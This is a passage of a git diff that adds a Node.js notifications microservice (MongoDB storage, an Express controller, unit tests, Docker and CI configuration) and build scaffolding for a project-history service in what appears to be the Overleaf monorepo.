= { $unset: { templateKey: true, messageOpts: true } } + db.notifications.updateOne(searchOps, updateOperation, callback) + }, + + removeNotificationKey(userId, notificationKey, callback) { + const searchOps = { + user_id: new ObjectId(userId), + key: notificationKey, + } + const updateOperation = { $unset: { templateKey: true } } + db.notifications.updateOne(searchOps, updateOperation, callback) + }, + + removeNotificationByKeyOnly(notificationKey, callback) { + const searchOps = { key: notificationKey } + const updateOperation = { $unset: { templateKey: true } } + db.notifications.updateOne(searchOps, updateOperation, callback) + }, + + countNotificationsByKeyOnly(notificationKey, callback) { + const searchOps = { key: notificationKey, templateKey: { $exists: true } } + db.notifications.count(searchOps, callback) + }, + + deleteUnreadNotificationsByKeyOnlyBulk(notificationKey, callback) { + if (typeof notificationKey !== 'string') { + throw new Error('refusing to bulk delete arbitrary notifications') + } + const searchOps = { key: notificationKey, templateKey: { $exists: true } } + db.notifications.deleteMany(searchOps, (err, result) => { + if (err) return callback(err) + callback(null, result.deletedCount) + }) + }, + + // hard delete of doc, rather than removing the templateKey + deleteNotificationByKeyOnly(notificationKey, callback) { + const searchOps = { key: notificationKey } + db.notifications.deleteOne(searchOps, callback) + }, +} diff --git a/services/notifications/app/js/NotificationsController.js b/services/notifications/app/js/NotificationsController.js new file mode 100644 index 0000000..89b7fa9 --- /dev/null +++ b/services/notifications/app/js/NotificationsController.js @@ -0,0 +1,117 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Notifications = require('./Notifications') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') + +module.exports = { + getUserNotifications(req, res, next) { + logger.debug( + { userId: req.params.user_id }, + 'getting user unread notifications' + ) + metrics.inc('getUserNotifications') + return Notifications.getUserNotifications( + req.params.user_id, + (err, notifications) => { + if (err) return next(err) + res.json(notifications) + } + ) + }, + + addNotification(req, res) { + logger.debug( + { userId: req.params.user_id, notification: req.body }, + 'adding notification' + ) + metrics.inc('addNotification') + return Notifications.addNotification( + req.params.user_id, + req.body, + function (err, notifications) { + if (err != null) { + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + } + ) + }, + + removeNotificationId(req, res, next) { + logger.debug( + { + userId: req.params.user_id, + notificationId: req.params.notification_id, + }, + 'mark id notification as read' + ) + metrics.inc('removeNotificationId') + return Notifications.removeNotificationId( + req.params.user_id, + req.params.notification_id, + err => { + if (err) return next(err) + res.sendStatus(200) + } + ) + }, + + removeNotificationKey(req, res, next) { + logger.debug( + { userId: req.params.user_id, notificationKey: req.body.key }, + 'mark key notification as read' + ) + metrics.inc('removeNotificationKey') + return Notifications.removeNotificationKey( + req.params.user_id, + req.body.key, + (err, notifications) => { + if (err) return next(err) + res.sendStatus(200) + } + ) + }, + + removeNotificationByKeyOnly(req, res, next) { + const notificationKey = req.params.key + logger.debug({ notificationKey }, 'mark notification as read by key only') + metrics.inc('removeNotificationKey') + return Notifications.removeNotificationByKeyOnly(notificationKey, err => { + if (err) return next(err) + res.sendStatus(200) + }) + }, + + countNotificationsByKeyOnly(req, res) { + const notificationKey = req.params.key + Notifications.countNotificationsByKeyOnly(notificationKey, (err, count) => { + if (err) { + logger.err({ err, notificationKey }, 'cannot count by key') + return res.sendStatus(500) + } + res.json({ count }) + }) + }, + + deleteUnreadNotificationsByKeyOnlyBulk(req, res) { + const notificationKey = req.params.key + Notifications.deleteUnreadNotificationsByKeyOnlyBulk( + notificationKey, + (err, count) => { + if (err) { + logger.err({ err, notificationKey }, 'cannot bulk remove by key') + return res.sendStatus(500) + } + res.json({ count }) + } + ) + }, +} diff --git a/services/notifications/app/js/mongodb.js b/services/notifications/app/js/mongodb.js new file mode 100644 index 0000000..764998f --- /dev/null +++ b/services/notifications/app/js/mongodb.js @@ -0,0 +1,18 @@ +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { MongoClient, ObjectId } = require('mongodb-legacy') + +const mongoClient = new MongoClient(Settings.mongo.url, Settings.mongo.options) +const mongoDb = mongoClient.db() + +const db = { + notifications: mongoDb.collection('notifications'), +} + +Metrics.mongodb.monitor(mongoClient) + +module.exports = { + db, + mongoClient, + ObjectId, +} diff --git a/services/notifications/buildscript.txt b/services/notifications/buildscript.txt new file mode 100644 index 0000000..c52e316 --- /dev/null +++ b/services/notifications/buildscript.txt @@ -0,0 +1,9 @@ +notifications +--dependencies=mongo +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 diff --git a/services/notifications/config/settings.defaults.js b/services/notifications/config/settings.defaults.js new file mode 100644 index 0000000..3453b88 --- /dev/null +++ b/services/notifications/config/settings.defaults.js @@ -0,0 +1,17 @@ +module.exports = { + internal: { + notifications: { + port: 3042, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, +} diff --git a/services/notifications/docker-compose.ci.yml b/services/notifications/docker-compose.ci.yml new file mode 100644 index 0000000..51eb64d --- /dev/null +++ b/services/notifications/docker-compose.ci.yml @@ -0,0 +1,52 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/notifications/docker-compose.yml b/services/notifications/docker-compose.yml new file mode 100644 index 0000000..c0902fe --- /dev/null +++ b/services/notifications/docker-compose.yml @@ -0,0 +1,56 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/notifications + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/notifications + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/notifications + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/notifications + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + command: npm run --silent test:acceptance + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + diff --git a/services/notifications/package.json b/services/notifications/package.json new file mode 100644 index 0000000..a591e89 --- /dev/null +++ b/services/notifications/package.json @@ -0,0 +1,41 @@ +{ + "name": "@overleaf/notifications", + "description": "An API to handle user notifications", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "author": "", + "license": "ISC", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "method-override": "^3.0.0", + "mongodb-legacy": "6.1.3", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } +} diff --git a/services/notifications/test/setup.js b/services/notifications/test/setup.js new file mode 100644 index 0000000..0560fc5 --- /dev/null +++ b/services/notifications/test/setup.js @@ -0,0 +1,30 @@ +const chai = require('chai') +const SandboxedModule = require('sandboxed-module') + +// Chai configuration +chai.should() + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb-legacy').ObjectId.cacheHexString = true + +// SandboxedModule configuration +SandboxedModule.configure({ + requires: { + '@overleaf/logger': { + debug() {}, + log() {}, + info() {}, + warn() {}, + err() {}, + error() {}, + fatal() {}, + }, + 'mongodb-legacy': require('mongodb-legacy'), // for ObjectId comparisons + }, + globals: { Buffer, JSON, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) diff --git a/services/notifications/test/unit/js/NotificationsControllerTest.js b/services/notifications/test/unit/js/NotificationsControllerTest.js new file mode 100644 index 0000000..4c0626d --- /dev/null +++ b/services/notifications/test/unit/js/NotificationsControllerTest.js @@ -0,0 +1,149 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../app/js/NotificationsController.js' +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') + +const userId = '51dc93e6fb625a261300003b' +const notificationId = 'fb625a26f09d' +const notificationKey = 'my-notification-key' + +describe('Notifications Controller', function () { + beforeEach(function () { + const self = this + this.notifications = {} + this.controller = SandboxedModule.require(modulePath, { + requires: { + './Notifications': this.notifications, + '@overleaf/metrics': { + inc: sinon.stub(), + }, + }, + }) + + return (this.stubbedNotification = [ + { + key: notificationKey, + messageOpts: 'some info', + templateKey: 'template-key', + }, + ]) + }) + + describe('getUserNotifications', function () { + return it('should ask the notifications for the users notifications', function (done) { + this.notifications.getUserNotifications = sinon + .stub() + .callsArgWith(1, null, this.stubbedNotification) + const req = { + params: { + user_id: userId, + }, + } + return this.controller.getUserNotifications(req, { + json: result => { + result.should.equal(this.stubbedNotification) + this.notifications.getUserNotifications + .calledWith(userId) + .should.equal(true) + return done() + }, + }) + }) + }) + + describe('addNotification', function () { + return it('should tell the notifications to add the notification for the user', function (done) { + this.notifications.addNotification = sinon.stub().callsArgWith(2) + const req = { + params: { + user_id: userId, + }, + body: this.stubbedNotification, + } + return this.controller.addNotification(req, { + sendStatus: code => { + this.notifications.addNotification + .calledWith(userId, this.stubbedNotification) + .should.equal(true) + code.should.equal(200) + return done() + }, + }) + }) + }) + + describe('removeNotificationId', function () { + return it('should tell the notifications to mark the notification Id as read', function (done) { + this.notifications.removeNotificationId = sinon.stub().callsArgWith(2) + const req = { + params: { + user_id: userId, + notification_id: notificationId, + }, + } + return this.controller.removeNotificationId(req, { + sendStatus: code => { + this.notifications.removeNotificationId + .calledWith(userId, notificationId) + .should.equal(true) + code.should.equal(200) + return done() + }, + }) + }) + }) + + describe('removeNotificationKey', function () { + return it('should tell the notifications to mark the notification Key as read', function (done) { + this.notifications.removeNotificationKey = sinon.stub().callsArgWith(2) + const req = { + params: { + user_id: userId, + }, + body: { key: notificationKey }, + } + return this.controller.removeNotificationKey(req, { + sendStatus: code => { + this.notifications.removeNotificationKey + .calledWith(userId, notificationKey) + .should.equal(true) + code.should.equal(200) + return done() + }, + }) + }) + }) + + return describe('removeNotificationByKeyOnly', function () { + return it('should tell the notifications to mark the notification Key as read', function (done) { + this.notifications.removeNotificationByKeyOnly = sinon + .stub() + .callsArgWith(1) + const req = { + params: { + key: notificationKey, + }, + } + return this.controller.removeNotificationByKeyOnly(req, { + sendStatus: code => { + this.notifications.removeNotificationByKeyOnly + .calledWith(notificationKey) + .should.equal(true) + code.should.equal(200) + return done() + }, + }) + }) + }) +}) diff --git a/services/notifications/test/unit/js/NotificationsTests.js b/services/notifications/test/unit/js/NotificationsTests.js new file mode 100644 index 0000000..fb485bb --- /dev/null +++ b/services/notifications/test/unit/js/NotificationsTests.js @@ -0,0 +1,302 @@ +/* eslint-disable + no-dupe-keys, + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../app/js/Notifications.js' +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') +const { ObjectId } = require('mongodb-legacy') + +const userId = '51dc93e6fb625a261300003b' +const notificationId = '574ee8d6f40c3a244e704249' +const notificationKey = 'notification-key' + +describe('Notifications Tests', function () { + beforeEach(function () { + this.findToArrayStub = sinon.stub() + this.findStub = sinon.stub().returns({ toArray: this.findToArrayStub }) + this.countStub = sinon.stub() + this.updateOneStub = sinon.stub() + this.deleteOneStub = sinon.stub() + this.db = { + notifications: { + find: this.findStub, + count: this.countStub, + updateOne: this.updateOneStub, + deleteOne: this.deleteOneStub, + }, + } + + this.notifications = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': {}, + './mongodb': { db: this.db, ObjectId }, + }, + }) + + this.stubbedNotification = { + user_id: new ObjectId(userId), + key: 'notification-key', + messageOpts: 'some info', + templateKey: 'template-key', + } + return (this.stubbedNotificationArray = [this.stubbedNotification]) + }) + + describe('getUserNotifications', function () { + return it('should find all notifications and return i', function (done) { + this.findToArrayStub.callsArgWith(0, null, this.stubbedNotificationArray) + return this.notifications.getUserNotifications( + userId, + (err, notifications) => { + if (err) return done(err) + notifications.should.equal(this.stubbedNotificationArray) + assert.deepEqual(this.findStub.args[0][0], { + user_id: new ObjectId(userId), + templateKey: { $exists: true }, + }) + return done() + } + ) + }) + }) + + describe('addNotification', function () { + beforeEach(function () { + this.stubbedNotification = { + user_id: new ObjectId(userId), + key: 'notification-key', + messageOpts: 'some info', + templateKey: 'template-key', + } + this.expectedDocument = { + user_id: this.stubbedNotification.user_id, + key: 'notification-key', + messageOpts: 'some info', + templateKey: 'template-key', + } + this.expectedQuery = { + user_id: this.stubbedNotification.user_id, + key: 'notification-key', + } + this.updateOneStub.yields() + return this.countStub.yields(null, 0) + }) + + it('should insert the notification into the collection', function (done) { + return this.notifications.addNotification( + userId, + this.stubbedNotification, + err => { + expect(err).not.to.exist + sinon.assert.calledWith( + this.updateOneStub, + this.expectedQuery, + { $set: this.expectedDocument }, + { upsert: true } + ) + return done() + } + ) + }) + + describe('when there is an existing notification', function (done) { + beforeEach(function () { + return this.countStub.yields(null, 1) + }) + + it('should fail to insert', function (done) { + return this.notifications.addNotification( + userId, + this.stubbedNotification, + err => { + expect(err).not.to.exist + sinon.assert.notCalled(this.updateOneStub) + return done() + } + ) + }) + + return it('should update the key if forceCreate is true', function (done) { + this.stubbedNotification.forceCreate = true + return this.notifications.addNotification( + userId, + this.stubbedNotification, + err => { + expect(err).not.to.exist + sinon.assert.calledWith( + this.updateOneStub, + this.expectedQuery, + { $set: this.expectedDocument }, + { upsert: true } + ) + return done() + } + ) + }) + }) + + describe('when the notification is set to expire', function () { + beforeEach(function () { + this.stubbedNotification = { + user_id: new ObjectId(userId), + key: 'notification-key', + messageOpts: 'some info', + templateKey: 'template-key', + expires: '2922-02-13T09:32:56.289Z', + } + this.expectedDocument = { + user_id: this.stubbedNotification.user_id, + key: 'notification-key', + messageOpts: 'some info', + templateKey: 'template-key', + expires: new Date(this.stubbedNotification.expires), + } + return (this.expectedQuery = { + user_id: this.stubbedNotification.user_id, + key: 'notification-key', + }) + }) + + return it('should add an `expires` Date field to the document', function (done) { + return this.notifications.addNotification( + userId, + this.stubbedNotification, + err => { + expect(err).not.to.exist + sinon.assert.calledWith( + this.updateOneStub, + this.expectedQuery, + { $set: this.expectedDocument }, + { upsert: true } + ) + return done() + } + ) + }) + }) + + return describe('when the notification has a nonsensical expires field', function () { + beforeEach(function () { + this.stubbedNotification = { + user_id: new ObjectId(userId), + key: 'notification-key', + messageOpts: 'some info', + templateKey: 'template-key', + expires: 'WAT', + } + return (this.expectedDocument = { + user_id: this.stubbedNotification.user_id, + key: 'notification-key', + messageOpts: 'some info', + templateKey: 'template-key', + expires: new Date(this.stubbedNotification.expires), + }) + }) + + return it('should produce an error', function (done) { + return this.notifications.addNotification( + userId, + this.stubbedNotification, + err => { + ;(err instanceof Error).should.equal(true) + sinon.assert.notCalled(this.updateOneStub) + return done() + } + ) + }) + }) + }) + + describe('removeNotificationId', function () { + return it('should mark the notification id as read', function (done) { + this.updateOneStub.callsArgWith(2, null) + + return this.notifications.removeNotificationId( + userId, + notificationId, + err => { + if (err) return done(err) + const searchOps = { + user_id: new ObjectId(userId), + _id: new ObjectId(notificationId), + } + const updateOperation = { + $unset: { templateKey: true, messageOpts: true }, + } + assert.deepEqual(this.updateOneStub.args[0][0], searchOps) + assert.deepEqual(this.updateOneStub.args[0][1], updateOperation) + return done() + } + ) + }) + }) + + describe('removeNotificationKey', function () { + return it('should mark the notification key as read', function (done) { + this.updateOneStub.callsArgWith(2, null) + + return this.notifications.removeNotificationKey( + userId, + notificationKey, + err => { + if (err) return done(err) + const searchOps = { + user_id: new ObjectId(userId), + key: notificationKey, + } + const updateOperation = { + $unset: { templateKey: true }, + } + assert.deepEqual(this.updateOneStub.args[0][0], searchOps) + assert.deepEqual(this.updateOneStub.args[0][1], updateOperation) + return done() + } + ) + }) + }) + + describe('removeNotificationByKeyOnly', function () { + return it('should mark the notification key as read', function (done) { + this.updateOneStub.callsArgWith(2, null) + + return this.notifications.removeNotificationByKeyOnly( + notificationKey, + err => { + if (err) return done(err) + const searchOps = { key: notificationKey } + const updateOperation = { $unset: { templateKey: true } } + assert.deepEqual(this.updateOneStub.args[0][0], searchOps) + assert.deepEqual(this.updateOneStub.args[0][1], updateOperation) + return done() + } + ) + }) + }) + + return describe('deleteNotificationByKeyOnly', function () { + return it('should completely remove the notification', function (done) { + this.deleteOneStub.callsArgWith(1, null) + + return this.notifications.deleteNotificationByKeyOnly( + notificationKey, + err => { + if (err) return done(err) + const searchOps = { key: notificationKey } + assert.deepEqual(this.deleteOneStub.args[0][0], searchOps) + return done() + } + ) + }) + }) +}) diff --git a/services/notifications/tsconfig.json b/services/notifications/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/notifications/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/project-history/.eslintignore b/services/project-history/.eslintignore new file mode 100644 index 0000000..8ac8c2d --- /dev/null +++ b/services/project-history/.eslintignore @@ -0,0 +1 @@ +app/lib/*.js diff --git a/services/project-history/.gitignore b/services/project-history/.gitignore new file mode 100644 index 0000000..25328fe --- /dev/null +++ b/services/project-history/.gitignore @@ -0,0 +1,8 @@ +**.swp +node_modules/ +forever/ +.config +.npm + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/project-history/.mocharc.json b/services/project-history/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/project-history/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/project-history/.nvmrc b/services/project-history/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/project-history/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/project-history/Dockerfile b/services/project-history/Dockerfile new file mode 100644 index 0000000..1bf4e56 --- /dev/null +++ b/services/project-history/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/project-history + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/project-history/package.json /overleaf/services/project-history/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/project-history/ /overleaf/services/project-history/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/project-history/Makefile b/services/project-history/Makefile new file mode 100644 index 0000000..5cde05e --- /dev/null +++ b/services/project-history/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = project-history +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json --volume $(MONOREPO)/services/document-updater/app/js/types.ts:/overleaf/services/document-updater/app/js/types.ts ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/project-history/README.md b/services/project-history/README.md new file mode 100644 index 0000000..9d51192 --- /dev/null +++ b/services/project-history/README.md @@ -0,0 +1,71 @@ +@overleaf/project-history +========================== + +An API for converting raw editor updates into a compressed and browseable history. + +Running project-history +----------------------- + +The app runs natively using npm and Node on the local system: + +``` +npm install +npm run start +``` + +Unit Tests +---------- + +The test suites run in Docker. + +Unit tests can be run in the `test_unit` container defined in `docker-compose.tests.yml`. + +The makefile contains a short cut to run these: + +``` +make install # Only needs running once, or when npm packages are updated +make test_unit +``` + +During development it is often useful to only run a subset of tests, which can be configured with arguments to the mocha CLI: + +``` +make 